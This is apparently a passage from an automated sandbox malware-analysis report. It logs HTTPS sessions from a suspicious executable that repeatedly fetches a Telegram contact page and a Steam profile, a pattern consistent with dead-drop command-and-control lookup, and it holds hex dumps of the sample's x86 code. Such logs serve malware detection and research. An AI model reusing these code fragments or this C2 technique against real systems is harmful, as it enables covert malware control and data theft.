                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: d0 a1 4c cc 45 00 8b 0d 20 cc 45 00 8b 91 57 62 fc 4c 01 da 8d 75 a4 89 f9 ff b0 3f 62 fc 4c 56 ff d2 8d 45 08 83 c0 40 8b 0d 20 cc 45 00 8b 91 47 62 fc 4c 01 da 89 f1 50 8d 7d d0 57 ff d2 a1 20 cc 45 00 8b 80 53 62 fc 4c 01 d8 b9 ea 68 fc 4c 03 0d 2c cc 45 00 be aa ad 46 00 51 56 ff d0 83 c4 08 a1 20 cc 45 00 8b 80 57 62 fc 4c 01 d8 89 f9 56 8d 75 c4 56 ff d0 a1 20 cc 45 00 8b 80 73 62 fc 4c 01 d8 8d bd 7c ff ff ff 6a 06 57 ff d0 a1 20 cc 45 00 8b 80 47 62 fc 4c 01 d8 89 f1 57 8d 75 e8 56 ff d0 a1 20 cc 45 00 8b 80 4b 62 fc 4c 01 d8 8d 4d dc 56 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 89 f1 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 89 f9 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 4d c4 ff d0 a1 20 cc 45 00 8b 80 4f 62 fc 4c 01 d8 8d 4d d0 ff
                                                                                                                                                                                                                    Data Ascii: LE EWbLu?bLVE@ EGbLP}W ESbLhL,EFQV EWbLVuV EsbL|jW EGbLWuV EKbLMV EObL EObL EObLM EObLM
                                                                                                                                                                                                                    2024-12-23 08:01:12 UTC1378INData Raw: 06 32 51 20 88 50 06 0f b6 51 07 32 51 21 88 50 07 0f b6 51 08 32 51 22 88 50 08 0f b6 51 09 32 51 23 88 50 09 0f b6 51 0a 32 51 24 88 50 0a 0f b6 51 0b 32 51 25 88 50 0b c6 05 68 ad 46 00 01 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 80 3d 8d ad 46 00 00 75 50 55 53 57 56 8b 74 24 18 8b 7c 24 14 31 c9 bb dc ff ff ff bd 1f 85 eb 51 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 89 c8 41 f7 e5 c1 ea 03 6b c2 e7 8d 14 1e 0f b6 44 10 24 32 44 1e 3d 88 44 1f 24 43 75 e2 c6 05 8d ad 46 00 01 5e 5f 5b 5d c3 cc cc cc cc cc cc 80 3d 94 ad 46 00 00 75 49 8b 4c 24 08 8b 44 24 04 0f b6 11 32 51 15 88 10 0f b6 51 01 32 51 16 88 50 01 0f b6 51 02 32 51 17 88 50 02 0f b6 51 03 32 51 18 88 50 03 0f b6 51 04 32 51 19 88 50 04 0f b6 51 05 32 51 1a 88 50 05 c6 05 94 ad 46 00
                                                                                                                                                                                                                    Data Ascii: 2Q PQ2Q!PQ2Q"PQ2Q#PQ2Q$PQ2Q%PhF=FuPUSWVt$|$1Qf.DAkD$2D=D$CuF^_[]=FuIL$D$2QQ2QPQ2QPQ2QPQ2QPQ2QPF


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    2192.168.2.449789149.154.167.994437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:01:15 UTC85OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-12-23 08:01:16 UTC511INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:01:16 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 9539
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155; expires=Tue, 24 Dec 2024 08:01:16 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                    2024-12-23 08:01:16 UTC9539INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    3192.168.2.449795104.102.49.2544437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:01:18 UTC119OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    2024-12-23 08:01:18 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:01:18 GMT
                                                                                                                                                                                                                    Content-Length: 35590
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Set-Cookie: sessionid=b089793df7dc153c4e38a65c; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                    2024-12-23 08:01:18 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                    2024-12-23 08:01:19 UTC16384INData Raw: 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                    Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="
                                                                                                                                                                                                                    2024-12-23 08:01:19 UTC3768INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f
                                                                                                                                                                                                                    Data Ascii: </div><div class="profile_header_badgeinfo"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamco
                                                                                                                                                                                                                    2024-12-23 08:01:19 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                    Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    4192.168.2.449869149.154.167.994437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:01:52 UTC144OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
                                                                                                                                                                                                                    2024-12-23 08:01:53 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:01:52 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 9538
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                    2024-12-23 08:01:53 UTC9538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.449874104.102.49.2544437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:01:54 UTC215OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Cookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
                                                                                                                                                                                                                    2024-12-23 08:01:55 UTC1733INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:01:55 GMT
                                                                                                                                                                                                                    Content-Length: 35590
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2024-12-23 08:01:55 UTC14651INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                    2024-12-23 08:01:55 UTC16384INData Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
                                                                                                                                                                                                                    Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
                                                                                                                                                                                                                    2024-12-23 08:01:55 UTC3584INData Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
                                                                                                                                                                                                                    Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
                                                                                                                                                                                                                    2024-12-23 08:01:55 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                    Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    6192.168.2.449952149.154.167.994437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:02:29 UTC144OUTGET /m3wm0w HTTP/1.1
                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Cookie: stel_ssid=5f4e6102837bcdeed2_14960932722618837155
                                                                                                                                                                                                                    2024-12-23 08:02:29 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 08:02:29 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 9539
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                    2024-12-23 08:02:29 UTC9539INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    7192.168.2.449958104.102.49.2544437672C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-12-23 08:02:31 UTC215OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Cookie: sessionid=b089793df7dc153c4e38a65c; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
                                                                                                                                                                                                                    2024-12-23 08:02:31 UTC1733INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
